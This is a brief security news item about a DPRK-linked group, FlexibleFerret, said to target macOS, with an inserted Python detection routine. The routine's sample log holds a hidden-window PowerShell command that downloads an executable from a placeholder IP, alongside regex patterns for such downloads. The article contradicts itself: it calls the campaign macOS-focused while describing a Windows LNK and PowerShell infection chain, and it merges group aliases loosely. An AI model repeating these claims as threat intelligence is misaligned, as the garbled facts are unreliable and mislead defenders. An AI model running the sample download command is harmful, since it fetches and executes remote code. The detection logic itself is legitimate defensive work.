Concise Cyber

DPRK-Linked FlexibleFerret Escalates macOS Cyberespionage with Upgraded Malware

Cybersecurity researchers have identified an ongoing campaign by FlexibleFerret, a cyberespionage group linked to the Democratic People’s Republic of Korea (DPRK), that demonstrates an increased focus on targeting macOS users. The group, also tracked under the aliases Kimsuky and Black Banshee, is deploying updated versions of its malware toolkit to infiltrate systems running Apple’s operating system.

The campaign, observed by researchers at Proofpoint, shows an evolution in the threat actor’s capabilities and a strategic expansion of its targeting beyond its more common Windows-based operations. This activity underscores a growing effort by DPRK-affiliated actors to develop and refine tools specifically for the macOS environment.

Infection Methods and Malware Capabilities

The primary infection vector used by FlexibleFerret is spear-phishing. Attackers send emails containing malicious LNK files, often disguised as legitimate documents like job descriptions. When a user opens the LNK file, it executes a PowerShell script that contacts a remote server to download additional malicious payloads.

The malware suite includes two key components. The first, a file enumerator named JunctionKey, is designed to search the compromised system for files with specific extensions. The second component, a downloader called JunctionBot, is responsible for fetching and executing further malware, allowing the attackers to establish a deeper foothold and deploy more advanced tools. The malware also establishes persistence on the infected macOS device, ensuring it remains active even after a system reboot.
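As an added example (not code from the article or from Proofpoint), the detection logic below correlates endpoint process and network events for the chain described above: an LNK file opened from the user's file manager spawns PowerShell, which then reaches out to a remote host for the next-stage payload. The telemetry is constructed, and the field names (`ts`, `type`, `pid`, `ppid`, `image`, `cmdline`, `dest`, `port`) are assumptions about the log schema.

```python
import json
import re

# Constructed sample telemetry in JSON-lines form; the field names are assumed.
# pid 52 is PowerShell launched by explorer.exe (how an opened LNK appears) that
# downloads a file; pid 63 is a benign admin script with no download activity.
SAMPLE_TELEMETRY = r"""
{"ts": 10, "type": "process", "pid": 41, "ppid": 7, "image": "explorer.exe", "cmdline": "explorer.exe"}
{"ts": 11, "type": "process", "pid": 52, "ppid": 41, "image": "powershell.exe", "cmdline": "powershell.exe -WindowStyle Hidden -Command Invoke-WebRequest 'http://203.0.113.7/jd' -OutFile $env:TEMP\\jd.exe"}
{"ts": 12, "type": "network", "pid": 52, "dest": "203.0.113.7", "port": 80}
{"ts": 20, "type": "process", "pid": 63, "ppid": 41, "image": "powershell.exe", "cmdline": "powershell.exe -File C:\\Tools\\inventory.ps1"}
{"ts": 25, "type": "network", "pid": 63, "dest": "10.0.0.5", "port": 445}
"""

SHELL_PARENTS = {"explorer.exe", "cmd.exe"}          # parents an opened LNK runs under
DOWNLOAD_MARKERS = re.compile(r"downloadstring|downloadfile|invoke-webrequest|https?://", re.I)
HIDDEN_MARKERS = re.compile(r"-w(indowstyle)?\s+hidden|-enc|-nop", re.I)
WINDOW = 60  # max seconds between PowerShell start and its first outbound connection


def parse(jsonl):
    """Parse JSON-lines telemetry into a list of event dicts."""
    return [json.loads(line) for line in jsonl.strip().splitlines() if line.strip()]


def find_lnk_powershell_chains(events, threshold=3):
    """Score each PowerShell process spawned by a shell parent; return those >= threshold."""
    procs = {e["pid"]: e for e in events if e["type"] == "process"}
    first_net = {}  # pid -> earliest outbound connection event
    for e in sorted((e for e in events if e["type"] == "network"), key=lambda e: e["ts"]):
        first_net.setdefault(e["pid"], e)
    hits = []
    for p in procs.values():
        parent = procs.get(p["ppid"])
        if p["image"].lower() != "powershell.exe" or not parent:
            continue
        if parent["image"].lower() not in SHELL_PARENTS:
            continue
        score, reasons = 0, []
        if DOWNLOAD_MARKERS.search(p["cmdline"]):
            score, reasons = score + 2, reasons + ["download cmdlet or URL in command line"]
        if HIDDEN_MARKERS.search(p["cmdline"]):
            score, reasons = score + 1, reasons + ["hidden window or encoded/no-profile flags"]
        net = first_net.get(p["pid"])
        if net and 0 <= net["ts"] - p["ts"] <= WINDOW:
            score, reasons = score + 2, reasons + [f"outbound to {net['dest']}:{net['port']} within {WINDOW}s"]
        if score >= threshold:
            hits.append({"pid": p["pid"], "score": score, "reasons": reasons})
    return hits
```

The benign script (pid 63) also connects out after launch but lacks download markers and hidden-window flags, so it stays below the threshold; tune the markers and window to your own telemetry before deploying.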

Strategic Shift in DPRK Operations

This campaign signifies a notable enhancement of the group’s macOS-specific toolset. The updated versions of JunctionKey and JunctionBot exhibit improved stealth and functionality compared to previous iterations. The focus on macOS aligns with a broader trend of threat actors diversifying their targets to include platforms that are gaining popularity in enterprise environments.

The activities of FlexibleFerret show operational overlaps with another well-known DPRK-linked group, TA406. The continued development of macOS malware by these state-sponsored actors indicates a dedicated effort to compromise a wider range of targets for intelligence-gathering purposes.

Source: https://www.darkreading.com/cyberattacks-data-breaches/dprks-flexibleferret-tightens-macos-grip